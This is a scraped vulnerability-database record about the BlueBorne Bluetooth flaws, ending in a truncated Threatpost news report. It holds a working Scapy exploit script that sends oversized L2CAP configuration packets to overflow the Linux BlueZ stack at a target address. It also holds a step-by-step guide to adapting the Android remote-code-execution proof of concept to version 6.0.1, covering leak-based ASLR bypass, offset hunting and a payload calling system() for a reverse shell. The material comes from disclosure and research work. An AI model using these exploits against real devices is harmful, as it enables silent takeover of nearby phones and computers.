Pineapple \u2013 Man in The Middle attack (CVE-2017-0783)\r\nMan-in-The-Middle (MiTM) attacks allow the attacker to intercept and intervene in all data going to or from the targeted device. To create a MiTM attack using Wi-Fi, the attacker requires both special equipment, and a connection request from the targeted device to an open WiFi network. In Bluetooth, the attacker can actively engage his target, using any device with Bluetooth capabilities. The vulnerability resides in the PAN profile of the Bluetooth stack, and enables the attacker to create a malicious network interface on the victim\u2019s device, re-configure IP routing and force the device to transmit all communication through the malicious network interface. This attack does not require any user interaction, authentication or pairing, making it practically invisible.\r\n\r\n#### BlueBorne attack on Windows\r\nWe have disclosed a vulnerability in Windows which allows an attacker to conduct a Man-in-The-Middle attack.\r\n\r\nHere is a quick demo of how BlueBorne can take create a MiTM attack:\r\nhttps://youtu.be/QrHbZPO9Rnc\r\n\r\n##### The Bluetooth Pineapple #2 \u2013 Man in The Middle attack (CVE-2017-8628)\r\n\r\nThis vulnerability is identical to the one found in the Android operating system, and affects both systems since they shared the same principals in implementing some of the Bluetooth protocol. The vulnerability resides in the Bluetooth stack, and enables the attacker to create a malicious network interface on the victim\u2019s device, re-configure IP routing and force the device to transmit all communication through it. This attack does not require any user interaction, authentication or pairing, making it also practically invisible.\r\n\r\n#### BlueBorne attack on Linux\r\nArmis has disclosed two vulnerabilities in the Linux operating system which allow attackers to take complete control over infected devices. The first is an information leak vulnerability, which can help the attacker determine the exact version used by the targeted device and adjust his exploit accordingly. The second is a stack overflow with can lead to full control of a device.\r\n\r\nHere is a quick demo of how BlueBorne can take over a Linux device:\r\nhttps://youtu.be/U7mWeKhd_-A\r\n\r\n##### Information leak vulnerability (CVE-2017-1000250)\r\n\r\nSimilar to the information leak vulnerability in Android, this vulnerability resides in the SDP server responsible for identifying other services using Bluetooth around the device. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. This can be used by an attacker to expose sensitive data from the Bluetooth processthat may also contain encryption keys of Bluetooth communications. These can be used by the attacker to initiate an attack that very much resembles heartbleed.\r\n\r\n##### A stack overflow in BlueZ (CVE-2017-1000251)\r\n\r\nThis vulnerability was found in the Bluetooth stack of the Linux Kernel, which is the very core of the operating system. An internal flaw in the L2CAP (Logical Link Control and Adaptation Protocol) that is used to connect between two devices causes a memory corruption. An attacker can use this memory corruption to gain full control of the device.\r\n\r\n#### BlueBorne attack on iOS\r\nThis vulnerability found by Armis was disclosed to Apple. Since it was mitigated in iOS version 10 and Apple TV version above 7.2.2, a full exploit was not developed to demonstrate how this vulnerability can be leveraged for gaining full control of an iOS device. However, this vulnerability still poses great risk to any iOS device prior to version 10, as it is does not require any interaction from the users, or configuration of any sort on the targeted device. The vulnerability can be leveraged by an attacker to gain remote code execution in a high-privileged context (the Bluetooth process).\r\n\r\n##### Remote code execution via Apple\u2019s Low Energy Audio Protocol\r\n\r\nThis vulnerability was found in a new protocol Apple has invented, which operates on top of Bluetooth, called LEAP (Low energy audio protocol). The protocol is designed to stream audio to low energy audio peripherals (such as low energy headsets, or the Siri Remote). This enables devices that only have Bluetooth Low Energy to stream audio and send audio commands. Due to a flaw in the implementation of LEAP, a large audio command can be sent to a targeted device and lead to a memory corruption. Since the audio commands sent via LEAP are not properly validated, an attacker can use the memory corruption to gain full control of the device.\r\n\r\n### Securing against BlueBorne\r\n\r\nVulnerabilities that can spread over the air and between devices pose a tremendous threat to any organization or individual. Current security measures, including endpoint protection, mobile data management, firewalls, and network security solution are not designed to identify these type of attacks, and related vulnerabilities and exploits, as their main focus is to block attacks that can spread via IP connections.\r\n\r\nNew solutions are needed to address the new airborne attack vector, especially those that make air gapping irrelevant. Additionally, there will need to be more attention and research as new protocols are using for consumers and businesses alike. With the large number of desktop, mobile, and IoT devices only increasing, it is critical we can ensure these types of vulnerabilities are not exploited. This is the primary mission of Armis in this new connected age.", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96467", "id": "SSV:96467", "type": "seebug", "title": "The IoT Attack Vector \u201cBlueBorne\u201d Exposes Almost Every Connected Device\n (BlueBorne)", "sourceData": "\n ## 1) Install Scapy ##\r\n\r\n[https://github.com/secdev/scapy](https://github.com/secdev/scapy)\r\n\r\n\r\nAdd/Replace these requests and responses in Bluetooth Protocol stack to these:\r\n\r\n\r\nscapy/layers/bluetooth.py\r\n\r\n\tclass L2CAP_ConfReq(Packet):\r\n\t name = \"L2CAP Conf Req\"\r\n\t fields_desc = [ LEShortField(\"dcid\",0),\r\n\t LEShortField(\"flags\",0),\r\n\t ByteField(\"type\",0),\r\n\t ByteField(\"length\",0),\r\n\t ByteField(\"identifier\",0),\r\n\t ByteField(\"servicetype\",0),\r\n\t LEShortField(\"sdusize\",0),\r\n\t LEIntField(\"sduarrtime\",0),\r\n\t LEIntField(\"accesslat\",0),\r\n\t LEIntField(\"flushtime\",0),\r\n\t ]\r\n\t\r\n\t\r\n\t\r\n\tclass L2CAP_ConfResp(Packet):\r\n\t name = \"L2CAP Conf Resp\"\r\n\t fields_desc = [ LEShortField(\"scid\",0),\r\n\t LEShortField(\"flags\",0),\r\n\t LEShortField(\"result\",0),\r\n\t ByteField(\"type0\",0),\r\n\t ByteField(\"length0\",0),\r\n\t LEShortField(\"option0\",0),\r\n\t ByteField(\"type1\",0),\r\n\t ByteField(\"length1\",0),\r\n\t LEShortField(\"option1\",0),\r\n\t ByteField(\"type2\",0),\r\n\t ByteField(\"length2\",0),\r\n\t LEShortField(\"option2\",0),\r\n\t ByteField(\"type3\",0),\r\n\t ByteField(\"length3\",0),\r\n\t LEShortField(\"option3\",0),\r\n\t ByteField(\"type4\",0),\r\n\t ByteField(\"length4\",0),\r\n\t LEShortField(\"option4\",0),\r\n\t ByteField(\"type5\",0),\r\n\t ByteField(\"length5\",0),\r\n\t LEShortField(\"option5\",0),\r\n\t ByteField(\"type6\",0),\r\n\t ByteField(\"length6\",0),\r\n\t LEShortField(\"option6\",0),\r\n\t ByteField(\"type7\",0),\r\n\t ByteField(\"length7\",0),\r\n\t LEShortField(\"option7\",0),\r\n\t ByteField(\"type8\",0),\r\n\t ByteField(\"length8\",0),\r\n\t LEShortField(\"option8\",0),\r\n\t ByteField(\"type9\",0),\r\n\t ByteField(\"length9\",0),\r\n\t LEShortField(\"option9\",0),\r\n\t ByteField(\"type10\",0),\r\n\t ByteField(\"length10\",0),\r\n\t LEShortField(\"option10\",0),\r\n\t ByteField(\"type11\",0),\r\n\t ByteField(\"length11\",0),\r\n\t LEShortField(\"option11\",0),\r\n\t ByteField(\"type12\",0),\r\n\t ByteField(\"length12\",0),\r\n\t LEShortField(\"option12\",0),\r\n\t ByteField(\"type13\",0),\r\n\t ByteField(\"length13\",0),\r\n\t LEShortField(\"option13\",0),\r\n\t ByteField(\"type14\",0),\r\n\t ByteField(\"length14\",0),\r\n\t LEShortField(\"option14\",0),\r\n\t ByteField(\"type15\",0),\r\n\t ByteField(\"length15\",0),\r\n\t LEShortField(\"option15\",0),\r\n\t ByteField(\"type16\",0),\r\n\t ByteField(\"length16\",0),\r\n\t LEShortField(\"option16\",0),\r\n\t ByteField(\"type17\",0),\r\n\t ByteField(\"length17\",0),\r\n\t LEShortField(\"option17\",0),\r\n\t ByteField(\"type18\",0),\r\n\t ByteField(\"length18\",0),\r\n\t LEShortField(\"option18\",0),\r\n\t ByteField(\"type19\",0),\r\n\t ByteField(\"length19\",0),\r\n\t LEShortField(\"option19\",0),\r\n\t ByteField(\"type20\",0),\r\n\t ByteField(\"length20\",0),\r\n\t LEShortField(\"option20\",0),\r\n\t ByteField(\"type21\",0),\r\n\t ByteField(\"length21\",0),\r\n\t LEShortField(\"option21\",0),\r\n\t ByteField(\"type22\",0),\r\n\t ByteField(\"length22\",0),\r\n\t LEShortField(\"option22\",0),\r\n\t ByteField(\"type23\",0),\r\n\t ByteField(\"length23\",0),\r\n\t LEShortField(\"option23\",0),\r\n\t ByteField(\"type24\",0),\r\n\t ByteField(\"length24\",0),\r\n\t LEShortField(\"option24\",0),\r\n\t ByteField(\"type25\",0),\r\n\t ByteField(\"length25\",0),\r\n\t LEShortField(\"option25\",0),\r\n\t ByteField(\"type26\",0),\r\n\t ByteField(\"length26\",0),\r\n\t LEShortField(\"option26\",0),\r\n\t ByteField(\"type27\",0),\r\n\t ByteField(\"length27\",0),\r\n\t LEShortField(\"option27\",0),\r\n\t ByteField(\"type28\",0),\r\n\t ByteField(\"length28\",0),\r\n\t LEShortField(\"option28\",0),\r\n\t ByteField(\"type29\",0),\r\n\t ByteField(\"length29\",0),\r\n\t LEShortField(\"option29\",0),\r\n\t ByteField(\"type30\",0),\r\n\t ByteField(\"length30\",0),\r\n\t LEShortField(\"option30\",0),\r\n\t ByteField(\"type31\",0),\r\n\t ByteField(\"length31\",0),\r\n\t LEShortField(\"option31\",0),\r\n\t ByteField(\"type32\",0),\r\n\t ByteField(\"length32\",0),\r\n\t LEShortField(\"option32\",0),\r\n\t ByteField(\"type33\",0),\r\n\t ByteField(\"length33\",0),\r\n\t LEShortField(\"option33\",0),\r\n\t ByteField(\"type34\",0),\r\n\t ByteField(\"length34\",0),\r\n\t LEShortField(\"option34\",0),\r\n\t ByteField(\"type35\",0),\r\n\t ByteField(\"length35\",0),\r\n\t LEShortField(\"option35\",0),\r\n\t ByteField(\"type36\",0),\r\n\t ByteField(\"length36\",0),\r\n\t LEShortField(\"option36\",0),\r\n\t ByteField(\"type37\",0),\r\n\t ByteField(\"length37\",0),\r\n\t LEShortField(\"option37\",0),\r\n\t ByteField(\"type38\",0),\r\n\t ByteField(\"length38\",0),\r\n\t LEShortField(\"option38\",0),\r\n\t ByteField(\"type39\",0),\r\n\t ByteField(\"length39\",0),\r\n\t LEShortField(\"option39\",0),\r\n\t ByteField(\"type40\",0),\r\n\t ByteField(\"length40\",0),\r\n\t LEShortField(\"option40\",0),\r\n\t ByteField(\"type41\",0),\r\n\t ByteField(\"length41\",0),\r\n\t LEShortField(\"option41\",0),\r\n\t ByteField(\"type42\",0),\r\n\t ByteField(\"length42\",0),\r\n\t LEShortField(\"option42\",0),\r\n\t ByteField(\"type43\",0),\r\n\t ByteField(\"length43\",0),\r\n\t LEShortField(\"option43\",0),\r\n\t ByteField(\"type44\",0),\r\n\t ByteField(\"length44\",0),\r\n\t LEShortField(\"option44\",0),\r\n\t ByteField(\"type45\",0),\r\n\t ByteField(\"length45\",0),\r\n\t LEShortField(\"option45\",0),\r\n\t ByteField(\"type46\",0),\r\n\t ByteField(\"length46\",0),\r\n\t LEShortField(\"option46\",0),\r\n\t ByteField(\"type47\",0),\r\n\t ByteField(\"length47\",0),\r\n\t LEShortField(\"option47\",0),\r\n\t ByteField(\"type48\",0),\r\n\t ByteField(\"length48\",0),\r\n\t LEShortField(\"option48\",0),\r\n\t ByteField(\"type49\",0),\r\n\t ByteField(\"length49\",0),\r\n\t LEShortField(\"option49\",0),\r\n\t ByteField(\"type50\",0),\r\n\t ByteField(\"length50\",0),\r\n\t LEShortField(\"option50\",0),\r\n\t ByteField(\"type51\",0),\r\n\t ByteField(\"length51\",0),\r\n\t LEShortField(\"option51\",0),\r\n\t ByteField(\"type52\",0),\r\n\t ByteField(\"length52\",0),\r\n\t LEShortField(\"option52\",0),\r\n\t ByteField(\"type53\",0),\r\n\t ByteField(\"length53\",0),\r\n\t LEShortField(\"option53\",0),\r\n\t ByteField(\"type54\",0),\r\n\t ByteField(\"length54\",0),\r\n\t LEShortField(\"option54\",0),\r\n\t ByteField(\"type55\",0),\r\n\t ByteField(\"length55\",0),\r\n\t LEShortField(\"option55\",0),\r\n\t ByteField(\"type56\",0),\r\n\t ByteField(\"length56\",0),\r\n\t LEShortField(\"option56\",0),\r\n\t ByteField(\"type57\",0),\r\n\t ByteField(\"length57\",0),\r\n\t LEShortField(\"option57\",0),\r\n\t ByteField(\"type58\",0),\r\n\t ByteField(\"length58\",0),\r\n\t LEShortField(\"option58\",0),\r\n\t ByteField(\"type59\",0),\r\n\t ByteField(\"length59\",0),\r\n\t LEShortField(\"option59\",0),\r\n\t ByteField(\"type60\",0),\r\n\t ByteField(\"length60\",0),\r\n\t LEShortField(\"option60\",0),\r\n\t ByteField(\"type61\",0),\r\n\t ByteField(\"length61\",0),\r\n\t LEShortField(\"option61\",0),\r\n\t ByteField(\"type62\",0),\r\n\t ByteField(\"length62\",0),\r\n\t LEShortField(\"option62\",0),\r\n\t ByteField(\"type63\",0),\r\n\t ByteField(\"length63\",0),\r\n\t LEShortField(\"option63\",0),\r\n\t ByteField(\"type64\",0),\r\n\t ByteField(\"length64\",0),\r\n\t LEShortField(\"option64\",0),\r\n\t ByteField(\"type65\",0),\r\n\t ByteField(\"length65\",0),\r\n\t LEShortField(\"option65\",0),\r\n\t ByteField(\"type66\",0),\r\n\t ByteField(\"length66\",0),\r\n\t LEShortField(\"option66\",0),\r\n\t ByteField(\"type67\",0),\r\n\t ByteField(\"length67\",0),\r\n\t LEShortField(\"option67\",0),\r\n\t ByteField(\"type68\",0),\r\n\t ByteField(\"length68\",0),\r\n\t LEShortField(\"option68\",0),\r\n\t ByteField(\"type69\",0),\r\n\t ByteField(\"length69\",0),\r\n\t LEShortField(\"option69\",0),\r\n\t ]\r\n\t\r\n\r\n## 2) Exploit ##\r\n\r\n\r\nbluebornexploit.py\r\n------------------------\r\n\t\r\n\tfrom scapy.all import *\r\n\t\r\n\tpkt = L2CAP_CmdHdr(code=4)/\r\n\tL2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)\r\n\t\r\n\t\r\n\tpkt1 = L2CAP_CmdHdr(code=5)/\r\n\tL2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)\r\n\t\r\n\t\r\n\tbt = BluetoothL2CAPSocket(\"00:1A:7D:DA:71:13\")\r\n\t\r\n\tbt.send(pkt)\r\n\tbt.send(pkt1)\r\n\t\r\n\r\nbluetoothsrv.py\r\n--------------------\r\n\r\n\tfrom scapy.all import *\r\n\t\r\n\tbt = BluetoothL2CAPSocket(\"01:02:03:04:05:06\")\r\n\t\r\n\tbt.recv()\n ", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96467"}, {"lastseen": "2017-11-19T12:12:21", "bulletinFamily": "exploit", "description": "A few days ago, the company Armis published a proof of concept (PoC) of a remote code execution vulnerability in Android via Bluetooth ([CVE-2017-0781](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0781)), known as BlueBorne. Although BlueBorne refers to a set of 8 vulnerabilities, this PoC uses only 2 of them to achieve its goal.\r\n\r\nThe exploitation process is divided into 2 phases, first the memory leak vulnerability ([CVE-2017-0785](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0785)) is used to know the memory addresses and bypass the ASLR protection, and thus make a call to the function libc library system and execute code on the phone, in this case a reverse shell.\r\n\r\nThe original source code of the Armis PoC is oriented to Android 7.1.2 on Pixel and Nexus 5X phones, and it is implied that to use it in another model it is only necessary to modify in the code the offsets of libc and bluetooth libraries.\r\n\r\nLater we will see how in the version 6.0.1 analyzed, the changes in the code of the bluetooth library are significant, complicating the exploitation and forcing us to make more modifications in the code of the PoC.\r\n\r\nTo perform some of the following actions it is necessary to have root privileges on the phone.\r\n\r\n### Libraries download\r\nThe first step is to extract the libraries to analyze them on our computer with IDA or Radare.\r\n```\r\n$ adb pull /system/lib/hw/bluetooth.default.so\r\n$ adb pull /system/lib/libc.so\r\n```\r\n\r\n### libc system function\r\nWe open libc.so with Radare and look for the system function. As we can see it is in the address `0x3ea04`, which we introduce in the variable `LIBC_TEXT_STSTEM_OFFSET = 0x3ea04 +1`.\r\n```\r\n\r\n$ r2 -A libc.so\r\n\r\n> afl~system\r\n0x0003ea04 10 184 sym.system\r\n```\r\n\r\n### Memory leak\r\n\r\nThe memory leak allows us to discover in which direction the libraries libc.so and bluetooth.default.so have been loaded.\r\n\r\nIn the analyzed model, the necessary elements are not in the same position of the extracted memory, so we must look for the values \u200b\u200bthat point inside the libraries and modify the following code according to this.\r\n```\r\nlikely_some_libc_blx_offset = result[X][X]\r\nlikely_some_bluetooth_default_global_var_offset = result[X][X]\r\n```\r\n\r\nTo perform this task we need to obtain a memory dump, and the section map of the com.android.bluetooth process. It\u2019s important to obtain this data at the same time because these addresses changes each time the process is restarted.\r\n```\r\n$ ps | grep blue\r\nbluetooth 2184 212 905552 47760 sys_epoll_ b6ca7894 S com.android.bluetooth\r\n\r\n$ cat /proc/2184/maps|grep bluetooth.default.so\r\nb376f000-b38b0000 r-xp 00000000 b3:19 1049 /system/lib/hw/bluetooth.default.so\r\nb38b1000-b38b4000 r--p 00141000 b3:19 1049 /system/lib/hw/bluetooth.default.so\r\nb38b4000-b38b5000 rw-p 00144000 b3:19 1049 /system/lib/hw/bluetooth.default.so\r\n```\r\nWe search in the memory leak a value between 0xb376f000 and 0xb38b5000, for convenience I use the script [CVE-2017-0785.py](https://github.com/ojasookert/CVE-2017-0785/blob/master/CVE-2017-0785.py)\r\n```\r\n$ python CVE-2017-0785.py TARGET=BC:F5:AC:XX:XX:XX | grep \"b3 7.\\|b3 8.\"\r\n00000050 00 00 00 00 00 02 00 01 00 00 01 00 b3 85 e3 b7\r\n00000060 00 00 00 00 ae df c5 f0 ac b6 19 10 b3 8b ed 84\r\n...\r\n000000f0 b3 8b ed 78 00 00 00 00 ab 10 2e 10 ab 12 af 50\r\n00000100 ac b6 11 f0 b3 8b ed 78 00 00 00 00 b3 85 e4 7d\r\n00000110 00 00 00 00 b3 85 e3 b7 ac b6 11 f0 b3 85 b9 11\r\n00000120 ac b6 11 f0 b3 8b ed 84 b3 84 8c 8d b3 97 f5 2c\r\n...\r\n00000180 00 00 00 00 b3 8b 3d 80 ae e1 55 ec ae e1 56 cc\r\n```\r\n\r\nIn my case I used 0xb38b3d80 (line 180), we calculated the offset and updated the variable `BLUETOOTH_BSS_SOME_VAR_OFFSET`, without forgetting also to update the element of the result table from which we have obtained this value.\r\n\r\nTo calculate the base address of libc we follow the same process.\r\n```\r\n$ cat /proc/2184/maps|grep libc.so\r\nb6c67000-b6cd9000 r-xp 00000000 b3:19 1118 /system/lib/libc.so\r\nb6cd9000-b6cdd000 r--p 00071000 b3:19 1118 /system/lib/libc.so\r\nb6cdd000-b6ce0000 rw-p 00075000 b3:19 1118 /system/lib/libc.so\r\n$ python CVE-2017-0785.py TARGET=BC:F5:AC:XX:XX:XX | grep \"b6 c.\"\r\n00000080 00 00 00 00 00 00 00 00 00 00 02 a8 b6 ce 92 e8\r\n000000a0 00 00 00 08 ab 1b 04 c8 b6 cd c5 94 00 00 00 01\r\n000000b0 b3 99 18 20 b6 cb c3 cf ab 1b 04 c8 ae df c8 68\r\n000000c0 ae ed 10 00 ab 10 2e 10 b6 ce 93 0c ab 1b 04 c0\r\n...\r\n00000350 b6 cd c5 94 00 00 00 01 ab 10 44 3c b6 cb c3 cf\r\n00000370 b6 ce 93 0c ab 1b 04 c0 b6 cd c5 94 ab 1b 04 c8\r\n00000380 ae ea 04 20 b6 cb f2 5b 00 01 00 00 ab 10 2f 00\r\n00000400 00 00 00 01 b6 cb 05 c3 ab 10 44 30 00 00 00 00\r\n```\r\n\r\nWith any of these values \u200b\u200bwe calculate the offset and enter it in the variable LIBC_SOME_BLX_OFFSET\r\n\r\nFrom this moment we can forget the ASLR.\r\n\r\n### Update\r\nWith this code we can show the memory leak of the result variable of the script.\r\n```\r\ndef print_result(result):\r\n i = 0\r\n for line in result:\r\n sys.stdout.write(\"%02d: \" % i)\r\n for x in line:\r\n sys.stdout.write(\"%08x \" % x) \r\n else:\r\n sys.stdout.write(\"\\n\")\r\n i += 1\r\n```\r\n\r\nIn addition, if we take samples of several processes we can compare them to see which values \u200b\u200bdo not change and take them as a reference.\r\n```\r\n$ python3 diff.py 1 2 3 4 5 6 7 8 9 10 11 12 13 14\r\n00: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 \r\n01: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 \r\n02: 00000000 00000000 00000000 00020001 a___0700 _____061 00000000 b6d__d59 _____481 \r\n03: ________ 00000000 00000008 _____541 _____1e3 00007530 00000000 ________ _____534 \r\n04: ________ _____534 a______0 _____463 _____481 ________ 00000000 00000000 ________ \r\n05: _____783 a______8 ________ _____000 a_______ b6d__274 a______0 b6d__594 a______8 \r\n06: ________ b6d__eeb ___0____ 00000008 b3______ _______0 _____f50 00000000 a_______ \r\n07: b3______ _______0 _____f50 00000000 _____bad 00000000 _____adf _______0 _____061 \r\n08: _______0 _____f58 _____481 _____bd8 00000000 0000000f ________ _____1e3 00007530 \r\n09: 00000000 _____bd8 _____534 _____bd8 _____534 _______0 _____463 _____481 _____bd8 \r\n10: 00000000 00000000 _____bd8 _____783 _____481 _____bd0 0000____ _______c _____d34 \r\n11: _______c _______b _______b 00000002 _____053 _______b 0000000_ 00000000 b4d____0 \r\n12: _____090 00000004 _____538 b6d__035 00000000 00000000 00000005 00000348 000005f0 \r\n13: b6d__250 ________ 00000005 _______0 _____000 00000008 a______8 b6d__594 00000001 \r\n14: 00000000 b6d__03f a______8 _______0 _____000 ________ b6d__274 a______0 b6d__594 \r\n15: a______8 _______0 b6d__eeb 00000000 _____c9d ________ 4000____ a______0 00000003 \r\n16: 00000000 a______0 a______8 ________ 00000004 _______c 00000006 _______c _____4c1 \r\n17: 0000004_ _______4 ________ 00000000 _____4e5 00000006 ________ 00000014 _____827 \r\n18: _____f3c _____75f fffff855 _____581 _____618 b______0 _____607 _____f5c 0000000f \r\n19: 0000000f 00000001 00000000 0000000f _______c _______4 ________ 00000000 _____bd7\r\n```\r\n\r\n### REMOTE_NAME variable\r\nThis variable contains the name of the device that makes the connection and in the PoC version 7.1.2 it is used to enter the system address and the bash command. Later it is detailed so that we will use this variable.\r\n\r\nThe method I followed to find the memory address of this variable has been to use GDB with PEDA-ARM and searchmem memory search function. This offset is entered in the variable BSS_ACL_REMOTE_NAME_OFFSET.\r\n\r\n\r\n\r\n\r\n\r\n### Payload\r\nAs we see in the technical detail of the Armis PoC https://go.armis.com/hubfs/BlueBorne - Android Exploit.pdf, if we overwrite R0 with the address of REMOTE_NAME , the btu_hci_msg_process function jumps to the address contained in [REMOTE_NAME + 8], leaving the address of REMOTE_NAME on R0.\r\n```\r\nmov r4, r0\r\n...\r\nldr r1, [r4 + 8]\r\nmov r0, r4\r\nblx r1\r\n```\r\n\r\nTherefore, in this case we enter the memory address of the system function in REMOTE_NAME+8. The argument that the system function will execute is the content of REMOTE_NAME, so having the system address inside it would cause an error. The people of Armis solve this problem using the following structure, in which the 2 commands are separated with ;, leaving the system address in position 8.\r\n\r\n```\r\nPayload is: '\"\\x17AAAAAAsysm\";\\n<bash_commands>\\n#'\r\n```\r\n\r\nIn version 6.0.1 of Android it is not possible to perform the operation in the same way since this same function does not exist in the library. On the other hand, within the exploitable functions, I have used the `000f1e36` function that also allows us to control the jump direction and the value of `r0`.\r\n\r\n\r\n\r\nThese are the instructions that allow us to control r0 and the jump direction.\r\n```\r\nldr r0, [r0 + 4]\r\n...\r\nldr r3, [r0 + 8]\r\nldr r0, [r0]\r\nldr r2, [r3 + 28]\r\nblx r2\r\n```\r\n\r\nSimplifying, we have the following equation, where x is the value of 4 bytes that we control.\r\n```\r\njump = [[[x+4]+8]+28]\r\nr0 = [[x+4]]\r\n```\r\n\r\nTo achieve our goal we need to use three pointers to control the jump, and one to control the r0; when originally only one was needed that pointed to system.\r\n\r\nThe payload used as REMOTE_NAME follows the following structure.\r\n```\r\n\r\n0 4 8 12 16 X\r\n+------------------+------+-----------+--------+---------------+\r\n| shellscript_addr | name | name - 16 | system | bash_commands |\r\n+------------------+------+-----------+--------+---------------+\r\n\r\nJump address:\r\n1 : [name+4] = name\r\n2 : [name+8] = name-16\r\n3 : [name-16+28] = [name+12] = system\r\n\r\nr0:\r\n1 : [name+4] = name\r\n2 : [name] = shellscript_addr\r\n```\r\n\r\n### Execution\r\nOnce the code is finished, we test it and observe how, like the original PoC, it is necessary to launch it several times to obtain a satisfactory exploitation.\r\n\r\n\r\n\r\n### Code\r\n[blueborne-nexus5.py](https://gist.github.com/jesux/64cf037c55c0d42196762c0ccacc7380)\r\n\r\n[diff.py](https://gist.github.com/jesux/976903dd7f70203ddd5d8bcaac1e38be)\r\n\r\n[Armis BlueBorne Android Exploit PoC](https://github.com/ArmisSecurity/blueborne)", "modified": "2017-11-16T00:00:00", "published": "2017-11-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96868", "id": "SSV:96868", "type": "seebug", "title": "BlueBorne RCE on Android 6.0.1 (CVE-2017-0781)", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:11", "bulletinFamily": "info", "description": "Researchers disclosed a bevy of Bluetooth vulnerabilities Tuesday that threaten billions of devices from Android and Apple smartphones to millions of printers, smart TVs and IoT devices that use the short-range wireless protocol.\n\nWorse, according to researchers at IoT security firm Armis that found the attack vector, the so-called \u201cBlueBorne\u201d attacks can jump from one nearby Bluetooth device to another wirelessly. It estimates that there are 5.3 billion devices at risk.\n\n\u201cIf exploited, the vulnerabilities could enable an attacker to take over devices, spread malware, or establish a \u2018man-in-the-middle\u2019 to gain access to critical data and networks without user interaction,\u201d according to the company. \u201cThe attack does not require the targeted device to be paired to the attacker\u2019s device, or even to be set on discoverable mode\u2026 since the Bluetooth process has high privileges on all operating systems, exploiting it provides virtually full control over the device.\u201d\n\nAs part of a coordinated disclosure, Armis said Google and Microsoft have already made patches available to their customers.\n\nIn a statement to Threatpost, Microsoft said: \u201cMicrosoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.\u201d\n\nMicrosoft\u2019s September Patch Tuesday disclosure lists one of the BlueBorne bugs (Bluetooth driver spoofing vulnerability \u2013 [CVE-2017-8628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)) as part of its security patches for the month.\n\nApple iOS devices running the most recent version of the OS (10.x) are safe, Armis said.\n\nAccording to researcher, only 45 percent of Android phones (960 million) are patchable, leaving 1.1 billion active Android devices older than Marshmallow (6.x) vulnerable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/09/06222831/BlueBorne.png>)\n\nAlso vulnerable are millions of smart Bluetooth devices running a version of Linux. Commercial and consumer-oriented versions of Linux (Tizen OS) are vulnerable to one of the BlueBorne bugs as are Linux devices running BlueZ and 3.3-rc1 (released in October 2011). All Windows computers since Windows Vista are affected, according to the researchers. Microsoft Windows Phones are not impacted.\n\n\u201cThis set of capabilities are every hacker\u2019s dream. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet,\u201d according to the company.\n\n\u201cThis means almost every computer, mobile device, smart TV or other IoT device running on one of these operating systems is endangered by at least one of the eight vulnerabilities. This covers a significant portion of all connected devices globally,\u201d researchers said.\n\nIn all, BlueBorne consists of eight related vulnerabilities, three of which are classified as critical. The vulnerabilities were found in the Bluetooth implementations in Android, 